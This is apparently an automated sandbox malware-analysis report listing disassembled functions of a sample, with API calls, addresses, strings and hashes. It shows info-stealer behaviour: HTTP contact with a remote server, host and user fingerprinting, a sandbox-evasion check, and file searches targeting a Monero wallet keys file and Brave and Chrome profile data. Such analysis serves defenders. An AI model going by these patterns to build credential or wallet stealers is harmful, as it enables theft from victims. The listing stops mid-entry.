                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714
                          • Opcode ID: 600d680c1239d35025b49ae2814dad2431850bcef8d5bbfbc2ad1460741ced9e
                          • Instruction ID: 78c41c35656f1d7250599e6002f689f367db3d185723c3c0f38606331754de45
                          • Opcode Fuzzy Hash: 600d680c1239d35025b49ae2814dad2431850bcef8d5bbfbc2ad1460741ced9e
                          • Instruction Fuzzy Hash: 17215EB5D00208ABDF10DFA5EC45ADE7B75FF05320F108629F915A72D0EB706A0ACB91

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                            • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                            • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,0128E5E0), ref: 00406303
                            • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                            • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0128DBB0,00000000,00000000,00400100,00000000), ref: 00406385
                            • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                            • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          • Opcode ID: 68903d0483a5cfddd37e4e678035d1cc38455bcd0da457ff09669bb0dc953b82
                          • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                          • Opcode Fuzzy Hash: 68903d0483a5cfddd37e4e678035d1cc38455bcd0da457ff09669bb0dc953b82
                          • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417910
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00417917
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                          • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                          • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                          • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0040112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00401132
                          • ExitProcess.KERNEL32 ref: 00401143
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                          • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                          • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                          • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 004010B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 004010F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                          • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                          • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                          • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                          APIs
                            • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417910
                            • Part of subcall function 004178E0: RtlAllocateHeap.NTDLL(00000000), ref: 00417917
                            • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                            • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                            • Part of subcall function 00417850: RtlAllocateHeap.NTDLL(00000000), ref: 00417887
                            • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                          • ExitProcess.KERNEL32 ref: 004011C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          • Opcode ID: aa4888be3a4750dc3e8542411c62f0187eb34aedb4e2e69f1eafe5013a8257c2
                          • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                          • Opcode Fuzzy Hash: aa4888be3a4750dc3e8542411c62f0187eb34aedb4e2e69f1eafe5013a8257c2
                          • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                          APIs
                          • wsprintfA.USER32 ref: 004138CC
                          • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                          • lstrcat.KERNEL32(?,?), ref: 00413935
                          • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                          • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                          • FindClose.KERNEL32(000000FF), ref: 00413C7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                          • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                          • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                          • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                          • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                          • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                          • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                          • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-726946144
                          • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                          • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                          • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                          • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                          APIs
                          • wsprintfA.USER32 ref: 0041492C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                          • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                          • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                          • FindClose.KERNEL32(000000FF), ref: 00414B92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*
                          • API String ID: 180737720-445461498
                          • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                          • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                          • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                          • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00414587
                          • wsprintfA.USER32 ref: 004145A6
                          • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                          • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                          • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                          • FindClose.KERNEL32(000000FF), ref: 004146A0
                          • lstrcat.KERNEL32(?,0128E4D0), ref: 004146C5
                          • lstrcat.KERNEL32(?,0128D0D8), ref: 004146D8
                          • lstrlen.KERNEL32(?), ref: 004146E5
                          • lstrlen.KERNEL32(?), ref: 004146F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*
                          • API String ID: 671575355-2848263008
                          • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                          • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                          • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                          • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                          APIs
                          • wsprintfA.USER32 ref: 00413EC3
                          • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                          • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                          • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                          • FindClose.KERNEL32(000000FF), ref: 00414081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 180737720-4073750446
                          • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                          • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                          • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                          • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                          APIs
                          • wsprintfA.USER32 ref: 0040ED3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                          • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                          • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                          • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmp
